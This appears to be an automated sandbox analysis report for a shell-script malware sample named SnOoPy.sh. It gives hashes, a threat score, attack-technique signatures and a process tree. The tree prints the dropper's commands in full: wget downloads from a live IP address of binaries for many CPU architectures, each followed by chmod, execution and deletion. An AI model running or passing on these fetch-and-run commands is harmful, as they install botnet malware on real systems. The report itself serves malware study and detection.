Analysis
-
max time kernel
46s -
max time network
50s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
-
submitted
06-12-2024 14:06
General
-
Target
script_malware/SnOoPy.sh
-
Size
2KB
-
MD5
f0664749e65d26335de79a90c7074d00
-
SHA1
0deb03914ba232314b5214803dd97b94c1c9d9e5
-
SHA256
57ad07730428c1412ba43f4470c2074f4f0ef4e6eb5fcd24c9e19e49028e455a
-
SHA512
b605e84c23dad423a5e585c49957b0ade5f8764681f010fc1d192c81f677e4a849872db8afedd262e740f648aca18649a89420a54a02f1f1bd594c2125c2b6ff
Score
7/10
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
System Network Configuration Discovery 1 TTPs 1 IoCs
Adversaries may gather information about the network configuration of a system.
Processes
-
/tmp/script_malware/SnOoPy.sh/tmp/script_malware/SnOoPy.sh1⤵
- System Network Configuration Discovery
-
/usr/bin/wgetwget http://185.144.159.137/m-i.p-s.SNOOPY2⤵
-
-
/bin/chmodchmod +x m-i.p-s.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/m-i.p-s.SNOOPY./m-i.p-s.SNOOPY2⤵
-
-
/bin/rmrm -rf m-i.p-s.SNOOPY2⤵
-
-
/usr/bin/wgetwget http://185.144.159.137/m-p.s-l.SNOOPY2⤵
-
-
/bin/chmodchmod +x m-p.s-l.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/m-p.s-l.SNOOPY./m-p.s-l.SNOOPY2⤵
-
-
/bin/rmrm -rf m-p.s-l.SNOOPY2⤵
-
-
/usr/bin/wgetwget http://185.144.159.137/s-h.4-.SNOOPY2⤵
-
-
/bin/chmodchmod +x s-h.4-.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/s-h.4-.SNOOPY./s-h.4-.SNOOPY2⤵
-
-
/bin/rmrm -rf s-h.4-.SNOOPY2⤵
-
-
/usr/bin/wgetwget http://185.144.159.137/x-8.6-.SNOOPY2⤵
-
-
/bin/chmodchmod +x x-8.6-.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/x-8.6-.SNOOPY./x-8.6-.SNOOPY2⤵
-
-
/bin/rmrm -rf x-8.6-.SNOOPY2⤵
-
-
/usr/bin/wgetwget http://185.144.159.137/a-r.m-6.SNOOPY2⤵
-
-
/bin/chmodchmod +x a-r.m-6.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/a-r.m-6.SNOOPY./a-r.m-6.SNOOPY2⤵
-
-
/bin/rmrm -rf a-r.m-6.SNOOPY2⤵
-
-
/usr/bin/wgetwget http://185.144.159.137/x-3.2-.SNOOPY2⤵
-
-
/bin/chmodchmod +x x-3.2-.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/x-3.2-.SNOOPY./x-3.2-.SNOOPY2⤵
-
-
/bin/rmrm -rf x-3.2-.SNOOPY2⤵
-
-
/usr/bin/wgetwget http://185.144.159.137/a-r.m-7.SNOOPY2⤵
-
-
/bin/chmodchmod +x a-r.m-7.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/a-r.m-7.SNOOPY./a-r.m-7.SNOOPY2⤵
-
-
/bin/rmrm -rf a-r.m-7.SNOOPY2⤵
-
-
/usr/bin/wgetwget http://185.144.159.137/p-p.c-.SNOOPY2⤵
-
-
/bin/chmodchmod +x p-p.c-.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/p-p.c-.SNOOPY./p-p.c-.SNOOPY2⤵
-
-
/bin/rmrm -rf p-p.c-.SNOOPY2⤵
-
-
/usr/bin/wgetwget http://185.144.159.137/i-5.8-6.SNOOPY2⤵
-
-
/bin/chmodchmod +x i-5.8-6.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/i-5.8-6.SNOOPY./i-5.8-6.SNOOPY2⤵
-
-
/bin/rmrm -rf i-5.8-6.SNOOPY2⤵
-
-
/usr/bin/wgetwget http://185.144.159.137/m-6.8-k.SNOOPY2⤵
-
-
/bin/chmodchmod +x m-6.8-k.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/m-6.8-k.SNOOPY./m-6.8-k.SNOOPY2⤵
-
-
/bin/rmrm -rf m-6.8-k.SNOOPY2⤵
-
-
/usr/bin/wgetwget http://185.144.159.137/p-p.c-.SNOOPY2⤵
-
-
/bin/chmodchmod +x p-p.c-.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/p-p.c-.SNOOPY./p-p.c-.SNOOPY2⤵
-
-
/bin/rmrm -rf p-p.c-.SNOOPY2⤵
-
-
/usr/bin/wgetwget http://185.144.159.137/a-r.m-4.SNOOPY2⤵
-
-
/bin/chmodchmod +x a-r.m-4.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/a-r.m-4.SNOOPY./a-r.m-4.SNOOPY2⤵
-
-
/bin/rmrm -rf a-r.m-4.SNOOPY2⤵
-
-
/usr/bin/wgetwget http://185.144.159.137/a-r.m-5.SNOOPY2⤵
-
-
/bin/chmodchmod +x a-r.m-5.SNOOPY2⤵
- File and Directory Permissions Modification
-
-
/tmp/a-r.m-5.SNOOPY./a-r.m-5.SNOOPY2⤵
-
-
/bin/rmrm -rf a-r.m-5.SNOOPY2⤵
-